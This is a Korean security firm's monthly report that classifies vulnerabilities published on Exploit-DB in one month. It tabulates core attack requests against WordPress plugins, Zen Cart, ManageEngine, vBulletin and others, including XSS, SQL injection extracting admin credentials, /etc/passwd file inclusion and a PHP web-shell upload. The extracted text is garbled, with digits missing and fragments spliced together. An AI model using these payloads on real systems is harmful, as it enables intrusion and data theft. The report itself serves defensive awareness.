EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

Size: px

Start display at page:

Download "EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun"

기영 근
7 years ago
Views:

1 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04 년 09 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. 분석된 Cross Site Scripting 공격들은난이도측면에서단순한공격들임에도불구고특정소프트웨어에서다수의취약점이발견되었습니다. 해당소프트웨어를사용는관리자는업데이트를실시여 Cross Site Scripting 공격에노출되지않도록각별한주의가필요합니다, 이번달에는특히 Local File Inclusion 공격에대한취약점이많이보고되었습니다. 해당취약점들은위험도가매우높은취약점들로, 공격이성공할시서버의계정정보는물론다른중요한파일들까지노출될수있어치명적인피해를초래할수있습니다. 해당서버의관리자는사용자입력값을엄격게검증여 Local File Inlcusion 공격을차단할필요가있습니다. 주요소프트웨어취약점발생현황을보면 에서가장많은취약점이보고되었으며다음으로,, Zen Cart 순이였습니다. 앞의두개의소프트웨어는흔히사용는 CMS 이며뒤의두개는전자거래오픈솔루션으로써널리이용되고있는소프트웨어입니다. 네개모두사용률이높은소프트웨어로써자신의소프트웨어가해당소프트웨어중의나라면취약점에대비할수있도록주기적인취약점보안패치실시가반드시필요합니다.. 취약점별보고개수취약점 보고개수 XSS 8 SQL Injection 4 LFI 8 4 File Upload 총합계 취약점별보고개수 XSS SQL Injection LFI 8 4 File Upload. 위험도별분류 위험도 보고개수 백분율 % 중 % % 합계 % 8 위험도별분류 7 중 3. 공격난이도별현황공격난이도 보고개수 백분율 % 중.% % 총합계 % 공격난이도별현황 4 중 주요소프트웨어별취약점발생현황소프트웨어이름 Zen Cart ManageEngine Desktop vbulletin MyBB PHP Stock Management System LoadedCommerce Mpay4 phpmyfaq Atmail LittleSite webedition Restaurant Script (PizzaInn Project) Glype Cart Engine OsClass 총합계 보고개수 주요소프트웨어별취약점발생현황 9 Zen Cart ManageEngine Desktop vbulletin MyBB PHP Stock Management System LoadedCommerce Mpay4 phpmyfaq Atmail LittleSite webedition 5 Restaurant Script (PizzaInn Project) Glype Cart Engine ** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 3454 File Upload Slideshow Gallery Plugin.4. - admin.php File Upload 취약점 345 Mulitple Themes - admin-ajax.php 취약점 3454 SQL Injection Huge-IT Image Gallery.0. - admin.php SQL

2 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_counter.php SQL LFI Acento Theme - view-pdf.php LFI 취약점 SQL Injection 중 WP Support Plus Responsive Ticket System.0 Plugin - admin-ajax.php SQL LFI WP Support Plus Responsive Ticket System.0 Plugin - downloadattachment.php SQL 3478 SQL Injection All In One WP Security Plugin admin.php SQL 347 XSS 중 Login Widget With Shortcode 3..- options-general.php XSS 취약점 3457 SQL Injection Spider Calendar <= index.php SQL 345 SQL Injection Spider Contacts.3. - index.php SQL 3437 SQL Injection Spider Form Maker <= index.php SQL LFI Mac Gallery.5 - index.php LFI 취약점 SQL Injection Face Gallery.0 - index.php SQL LFI Face Gallery.0 - index.php LFI 취약점 3458 XSS 중 - mail.php XSS 취약점 3458 XSS 중 - newsletters.php XSS 취약점 3458 XSS 중 - banner_manager.php XSS 취약점 3458 XSS 중 - countries.php XSS 취약점 3458 XSS 중 - currencies.php XSS 취약점 3458 XSS 중 - languages.php XSS 취약점 3458 XSS 중 Zen Cart media_types.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart media_manager.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart music_genre.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart record_company.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart record_artists.php XSS 취약점 Zen Cart

3 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 POST /posnic-.0/update_details.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ PHP Stock Management System PHP Stock PHP Stock XSS 중.0 - update_details.php XSS 취 Management Management 약점 System System.0 sname=%3cscript%3ealert%8%9%3b%3c%fscript%3e &address=ghala+mandi&place=old+road&city=multan&pi n=&phone=033570&website= com& =umar%40gmail.com&submit=update POST /statusupdate?actiontocall=lfu&customerid=337&filena me=../../../../../../shell.jsp&configdataid= HTTP/ ManageEngine Desktop - /statusupdate 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ ManageEngin e Desktop ManageEngine Desktop POST /mdm/mdmloguploader?filename=..\\..\\..\webapps\\ Desktop\\shell.jsp HTTP/ ManageEngine Desktop - /mdmloguploader 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ ManageEngin e Desktop ManageEngine Desktop POST /agentloguploader?computername=whatever&domainna me=whatever&customerid=337&filename=..\\..\\..\\..\\webapps\\desktop\\shell.jsp HTTP/ ManageEngine Desktop - /agentloguploader 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ ManageEngin e Desktop ManageEngine Desktop POST slides&method=save HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows File Upload Slideshow Gallery Plugin.4. - admin.php File Upload 취약점 dd009908f Slideshow Gallery Plugin dd009908f filename="backdoor.php" <?php passthru($_get['cmd']);?> dd009908f Mulitple Themes - admin-ajax.php 취약점 /wp-admin/adminajax.php?action=revslider_show_image&img=../wpconfig.php SQL Injection Huge-IT Image Gallery.0. - admin.php SQL /wordpress/wpadmin/admin.php?page=gallerys_huge_it_gallery&task=edit _cat&id=&removeslide=%0and%0= Huge-IT Image Gallery.0.

4 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW SQL Injection AppleWebKit/535.7 KHTML, like Gecko Chrome/ vbulletin 4.0.x vbulletin 4.0.x vbulletin search.php SQL post_id%3d%0and%0%3d%up_type%3dlike POST /mybb/usercp.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ XSS 중 MyBB User Social Networks Plugin. - usercp.php XSS 취약점 my_post_key=a3baa4af a448dda4b&bday =&bday=&bday3=&birthdayprivacy=all&website=http% MyBB MyBB User Social Networks Plugin. 3A%F%F&profile_fields%5Bfid3%5D=Undisclosed&profile _fields%5bfid%5d=&profile_fields%5bfid%5d=&icq=&ai m=&msn=&yahoo=%3e%3cscript%3ealert%8document.c ookie%9%3c%fscript%3e%3c&away=0&awayreason=& awayday=&awaymonth=&awayyear=&action=do_profile&r egsubmit=update+profile POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/ SQL Injection Like Dislike Counter..3 Plugin - ajax_counter.php SQL User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Like Dislike Counter..3 Plugin post_id%3d%0and%0%3d%up_type%3dlike POST /register/ HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dd009908f dd009908f SQL Injection LoadedCommerce7 - /register/ SQL Content-Disposition: form-data; name="field_" :entry_lastname, LoadedComm erce LoadedComm erce dd009908f Content-Disposition: form-data; name="field_",(select user_name from lc_administrators order by id asc limit ),(select user_password from lc_administrators order by id asc limit ),3,4,5,,7,8,9,0)# dd009908f filename="" SQL Injection Mpay4 PrestaShop Payment Module.5 - confirm.php SQL /modules/mpay4/confirm.php?mpaytid=&status=bbb &TID=a%7%0or%0%7a%7%0in%0%8select%0IF %8SUBSTR%8@@version,,%9=5,BENCHMARK% ,SHA%80xDEADBEEF%9%9,%0false%9%9;% 0--%3 Mpay4 Mpay4 PrestaShop Payment Module.5 /catalog/admin/mail.php?action=preview HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ XSS 중 - mail.php XSS 취약점 customers_ _address=<script>alert()</script>&fro m=fuck@shit.up&subject=test&message=test

5 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 /catalog/admin/newsletters.php?action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW XSS 중 AppleWebKit/535.7 KHTML, like Gecko Chrome/ newsletters.php XSS 취약점 module=newsletter&title=<script>alert(3)</script>&cont ent=<script>alert(45)</script> /catalog/admin/banner_manager.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows XSS 중 dd009908f - banner_manager.php XSS 취약점 dd009908f Content-Disposition: form-data; name="banners_title" <script>alert();</script> dd009908f filename="info.gif" <?php passthru($_get['cmd']);?> dd009908f-- /catalog/admin/countries.php?page=&action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW XSS 중 - countries.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/ countries_name=aaa<script>alert()</script> /catalog/admin/currencies.php?page=&action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW XSS 중 - currencies.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/ title=<script>alert()</script> /catalog/admin/languages.php?action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW XSS 중 - languages.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/ name=<script>alert()</script>

6 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /create-content/gallery HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dd009908f XSS 중 vbulletin 5..X - /gallery XSS 취약점 dd009908f vbulletin vbulletin 5..X Content-Disposition: form-data; name="title_3" cool" onmouseover=alert() xssed=" dd009908f filename="" dd009908f-- GET /phpmyfaq/index.php HTTP/ XSS 중 phpmyfaq.8.x - index.php XSS 취약점 User-Agent: <script>alert()</script> Referer: <script>alert(3)</script> phpmyfaq phpmyfaq.8.x SQL Injection Spider Calendar <= index.php SQL Injection 취약점 /joomla/index.php?option=com_spidercalendar&calendar_i d=%0and%0=-- Spider Calendar <= 3.. POST /zen/zen-cart-v /admin3/media_types.php?page=&mid=&ac tion=save HTTP/ XSS 중 Zen Cart media_types.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="type_name" <script>alert()</script> dd009908f POST /zen/zen-cart-v /admin3/media_types.php?page=&mid=&ac tion=save HTTP/ XSS 중 Zen Cart media_manager.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="media_name" <script>alert()</script> dd009908f

7 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /zen/zen-cart-v /admin3/music_genre.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows XSS 중 Zen Cart music_genre.php XSS 취약점 Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="music_genre_name" <script>alert()</script> dd009908f POST /zen/zen-cart-v /admin3/record_company.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows XSS 중 Zen Cart record_company.php XSS 취약점 Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="record_company_name" <script>alert()</script> dd009908f POST /zen/zen-cart-v /admin3/record_artists.php?action=insert HTTP/ XSS 중 Zen Cart record_artists.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart dd009908f dd009908f Content-Disposition: form-data; name="artists_name" <script>alert()</script> dd009908f LFI Acento Theme - view-pdf.php LFI 취약점 /wp-content/themes/acento/includes/viewpdf.php?download=&file=/etc/passwd Acento Theme POST /mail/index.php/mail/mail/listfoldermessages/searching/tru e/selectfolder/inbox./resultcontext/searchresultstab HTTP/ XSS 중 Atmail Webmail 7. - /mail/index.php/mail/mail/listfol dermessages/searching/true/sel ectfolder/inbox./resultcont ext/searchresultstab XSS 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Atmail Atmail Webmail 7. searchquery=&goback=&from=&to=&subject=&body= &filter=<script>alert()</script> POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW SQL Injection 중 WP Support Plus Responsive Ticket System.0 Plugin - admin-ajax.php SQL AppleWebKit/535.7 KHTML, like Gecko Chrome/ WP Support Plus Responsive Ticket System.0 Plugin action=openticket&ticket_id=- UNION SELECT concat_ws(0x3a,version(),database(),user()),,3,4,5,,7 * any registered user can successfully execute this request

8 EDB 분석보고서 (04.09) SQL Injection Spider Contacts.3. - index.php SQL /joomla/index.php?option=com_spidercontacts&contact_i d=%0and%0=&view=showcontact&lang=ca Spider Contacts SQL Injection Spider Form Maker <= index.php SQL /index.php?option=com_formmaker&view=formmaker&id =%0and%0= Spider Form Maker <= SQL Injection SelectSurvey.net - ReviewReadOnlySurvey.aspx SQL /survey/reviewreadonlysurvey.aspx?responseid=<num>& SurveyID=%0and%0= SelectSurvey.n et SQL Injection SelectSurvey.net - UploadImagePopupToDb.aspx SQL /survey/uploadimagepopuptodb.aspx?responseid=<num >&SurveyID=%0and%0= SelectSurvey.n et LFI LFI XSS 중 LFI SQL Injection LFI LFI SQL Injection LittleSite 0. - index.php LFI 취약 /littlesite/index.php?file=../../../../etc/passwd LittleSite LittleSite 0. 점 webedition webedition /webedition/showtempfile.php?file=../../../../etc/passwd webedition showtempfile.php LFI 취약점 Restaurant Script(PizzaInn Project) - register-exec.php XSS 취약점 Mac Gallery.5 - index.php LFI 취약점 Face Gallery.0 - index.php SQL Face Gallery.0 - index.php LFI 취약점 Glype browse.php LFI 취 약점 All In One WP Security Plugin admin.php SQL /PizzaInn/register-exec.php? fname=<script>alert()</script>&lname=<script>alert()</s cript>&login=<script>alert()</script>&password=r00t&cpa ssword=r00t&question=8&answer=hack4&submit=registe r /index.php?option=com_macgallery&view=download&alb umid=../../etc/passwd /index.php?option=com_facegallery&view=images&aid= %0and%0=&lang=en /index.php?option=com_facegallery&task=imagedownloa d&img_name=../../etc/passwd GET /browse.php?u=&b=8 HTTP/. Cookie: s=../security ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WP Support Plus WP Support Responsive Ticket System.0 /wp-content/plugins/wp-support-plus-responsive-ticketsystem/includes/admin/downloadattachment.php?path=/et Plus LFI Plugin - Responsive downloadattachment.php SQL c/passwd Ticket System.0 Plugin /wpadmin/admin.php?page=aiowpsec&tab=tab&order=,% 8select%0load_file%8CONCAT%8CHAR%89%9, CHAR%89%9,%8select%0version%8%9%9,C HAR%84%9,CHAR%897%9,CHAR%8%9,C HAR%8%9,CHAR%897%9,CHAR%899%9,C HAR%807%9,CHAR%80%9,CHAR%84% 9,CHAR%84%9,CHAR%899%9,CHAR%8% 9,CHAR%809%9,CHAR%89%9,CHAR%80% 9,CHAR%8%9,CHAR%8%9,CHAR%898 %9,CHAR%897%9,CHAR%84%9%9%9% 9 POST /zen/zen-cart-v /admin3/media_types.php?page=&mid=&ac tion=save HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dd009908f Restaurant Script (PizzaInn Project) Restaurant Script (PizzaInn Project) Mac Gallery.5 Face Gallery.0 Face Gallery.0 Glype Glype.4.9 All In One WP Security Plugin SQL Injection Cart Engine cart.php SQL dd009908f Content-Disposition: form-data; name="item_id[0]" Cart Engine Cart Engine 3.0 8' AND (SELECT FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,floor(rand()*))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql dd009908f filename="" LFI OsClass index.php LFI 취약점 /osclass/ocadmin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd OsClass OsClass 3.4.

9 EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 XSS 중 Login Widget With Shortcode 3..- optionsgeneral.php XSS 취약점 POST /wp-admin/optionsgeneral.php?page=login_widget_afo HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/ Login Widget With Shortcode 3.. custom_style_afo=</textarea><script>alert()</script >

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection